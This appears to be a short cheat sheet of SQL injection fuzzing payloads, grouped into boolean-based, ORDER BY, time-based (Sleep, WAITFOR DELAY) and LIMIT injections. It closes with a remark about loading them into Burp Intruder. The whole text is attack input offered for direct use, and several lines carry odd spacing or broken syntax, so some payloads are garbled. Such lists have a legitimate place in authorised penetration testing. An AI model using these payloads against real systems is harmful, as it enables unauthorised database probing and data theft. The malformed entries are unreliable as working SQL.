1:bool sqlinjection
\
‘
"
%df '
%DF "
and 1=1
and 1=2
' and ' 1 ' = ' 1
' and ' 1 ' = ' 2
"and" 1 "=" 1
"and" 1 "=" 2
) and (1=1
) and (1=2
') and (' 1 ' = ' 1
') and (' 1 ' = ' 2
% ' and 1=1 and '% ' = '
% ' and 1=2 and '% ' = ' x
% ') and 1=1 and ('% ' = ')
% ') and 1=2 and ('% ' = ' x
OR 1=1
OR 1=2
' OR 1=1---
' OR 1=2---
) OR 1=1---
) OR 1=2---
') OR 1=1---
') OR 1=2---
"OR" 1 "=" 1
"OR" 1 "=" 2
' OR ' 1 ' = ' 1
' OR ' 1 ' = ' 2
) OR (1=1
) OR (1=2
') OR (' 1 ' = ' 1
') OR (' 1 ' = ' 2
2:order by Sqlinjection Fuzz payload
(Case if (1=1) then 1 else (select 1 Union select 2) end)
(Case if (1=2) then 1 else (select 1 Union select 2) end)
, (n (1=1) then 1 else (select 1 Union select 2) end))
, (n (1=2) then 1 else (select 1 Union select 2) end))
, 1=if ((1=1), 1, (select 1 Union select 2))
, 1=if ((1=2), 1, (select 1 Union select 2))
, If ((1=1), 1, (select 1 Union SELECT 2))---
, If ((1=2), 1, (select 1 Union SELECT 2))---
, If ((1=1), Sleep (4), (SELECT 1 Union SELECT 2))---
-if ((1=1), 1, (select 1 UNION select 2))---
-if ((1=2), 1, (select 1 UNION select 2))---
-(1=1) then 1 else (select 1 Union select 2) end)
-(1=2) then 1 else (select 1 Union select 2) end)
3:time-base sqlinjection
'%2b (if ((1=1 and Sleep (4)), 1, (select 1 Union select 2)))%2b ' A
-if ((1=1), Sleep (4), (select 1 UNION select 2))---
';(Select 1 from (Select (Sleep (4))) lwup)---
; SELECT Sleep (4)
); SELECT sleep (4)---
; SELECT sleep (4)---
;(Select 1 from (Select (Sleep (4))) lwup)---
' and SLEEP (4)%23
and Sleep (4)
' and sleep (4) and ' 1 ' = ' 1
') and sleep (4) and (' 1 ' = ' 1
) and Sleep (4) and (1=1
"and sleep (4) and" 1 "="
') and (select (0) from (Select (Sleep (4))) x)---
and (select (0) from (Select (Sleep (4))) x)
and (select (0) from (Select (Sleep (4))) x) and 1=1
' and (select (0) from (Select (Sleep (4))) x) and ' 1 ' = ' 1
"and (select (0) from (Select (Sleep (4))) x) and" 1 "=" 1
) and (select (0) from (Select (Sleep (4))) x) and (1=1
') and (select (0) from (Select (Sleep (4))) x) and (' 1 ' = ' 1
Rlike (select (0) from (Select (Sleep (4))) x) and 1=1
' Rlike (select (0) from (Select (Sleep (4))) x) and ' 1 ' = ' 1
) rlike (select (0) from (Select (Sleep (4))) x) and (1=1
') rlike (select (0) from (Select (Sleep (4))) x) and (' 1 ' = ' 1
; waitfor DELAY ' 0:0:4 '---
'; waitfor delay ' 0:0:4 '---
); waitfor delay ' 0:0:4 '---
WAITFOR DELAY ' 0:0:4 '---
if (now () =sysdate (), Sleep (4), 0)/* ' XOR (if (now () =sysdate (), Sleep (4), 0)) or ' "XOR (if (now () =sysdate (), Sleep (4), 0)) or" */
(SELECT * FROM (Select (Sleep (4))) lwup)
4:limit sqlinjection
Procedure Analyse (Extractvalue (1,if (1=1,benchmark (1), 2)), 1)
You don't have to say it, put burp Instuder fuzz on the line.
Share some of the usual SQL payloads for testing